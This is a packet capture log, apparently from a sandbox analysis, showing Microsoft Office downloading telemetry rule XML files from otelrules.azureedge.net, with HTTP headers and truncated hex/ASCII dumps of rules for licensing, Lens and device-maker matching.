                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:33 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"
                                                                                                                                                                                                                                            2024-11-14 12:02:57 UTC192OUTGET /rules/rule701300v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:57 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:57 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE6CE7711"
                                                                                                                                                                                                                                            x-ms-request-id: 58741c1b-901e-007b-0240-36ac50000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120257Z-1749fc9bdbd2c44rhC1DFWbxe000000002mg000000001sxn
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:57 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4c 69 63 65 6e 73 69 6e 67 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Licensing" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenLicensing" S="Medium" /> <F T="2


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            59192.168.2.44981613.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:33 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:33 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                                            x-ms-request-id: 1d5973b4-701e-0050-2a24-326767000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120233Z-16547b76f7f9rdn9hC1DFWfk7s0000000kgg00000000c5qq
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:33 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
                                                                                                                                                                                                                                            2024-11-14 12:02:57 UTC192OUTGET /rules/rule704051v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:57 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:57 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1393
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE102F2CE"
                                                                                                                                                                                                                                            x-ms-request-id: ff9cf50b-901e-00ac-6fd2-2cb69e000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120257Z-16547b76f7f9rdn9hC1DFWfk7s0000000kh000000000b7vd
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:57 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 34 30 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4c 65 6e 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4c 65 6e 73 22
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="704051" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Lens.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenLens"


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            60192.168.2.44981713.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:33 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:33 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:33 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 423
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                                            x-ms-request-id: 9d8c3af5-d01e-00a1-38a6-3435b1000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120233Z-r178fb8d765th6bkhC1DFWr7h000000002h0000000009hsg
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:33 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0
                                                                                                                                                                                                                                            2024-11-14 12:02:57 UTC192OUTGET /rules/rule704050v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:57 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1356
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE5B7FF88"
                                                                                                                                                                                                                                            x-ms-request-id: 6c10953d-c01e-0049-7ea3-34ac27000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120257Z-r178fb8d7655k45rhC1DFWpsgg00000002eg000000005gck
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:57 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 34 30 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4c 65 6e 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4c 65 6e 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="704050" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Lens" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenLens" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            61192.168.2.44981913.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:34 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:34 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 478
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                                            x-ms-request-id: de083b16-101e-0079-14f1-2c5913000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120234Z-16547b76f7f22sh5hC1DFWyb4w0000000kk0000000005cxb
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:34 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
                                                                                                                                                                                                                                            2024-11-14 12:02:58 UTC192OUTGET /rules/rule701700v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:58 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:58 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1386
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BEA21B9C1"
                                                                                                                                                                                                                                            x-ms-request-id: be3c3189-f01e-0071-3fd2-2c431c000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120258Z-16547b76f7fj5p7mhC1DFWf8w40000000ksg0000000044n8
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:58 UTC1386INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 37 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 49 6e 74 65 6c 6c 69 67 65 6e 74 53 65 72 76 69 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 49 6e 74 65 6c 6c 69 67 65 6e 74 53 65 72 76 69 63 65 73 22 20 53 3d 22 4d 65 64
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701700" V="1" DC="SM" EN="Office.Telemetry.Event.Office.IntelligentServices" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenIntelligentServices" S="Med


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            62192.168.2.44982013.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:34 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:34 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:34 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 404
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                                            x-ms-request-id: 140e2611-e01e-003c-3f87-36c70b000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120234Z-r178fb8d7656shmjhC1DFWu5kw00000002g0000000007tg2
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:34 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S
                                                                                                                                                                                                                                            2024-11-14 12:02:58 UTC192OUTGET /rules/rule702051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:58 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:58 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1401
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE632C2F7"
                                                                                                                                                                                                                                            x-ms-request-id: 8f5c4e04-101e-0046-1bd2-2c91b0000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120258Z-16547b76f7fkcrm9hC1DFWxdag0000000kq00000000099qr
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:58 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 49 6e 73 69 67 68 74 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 49
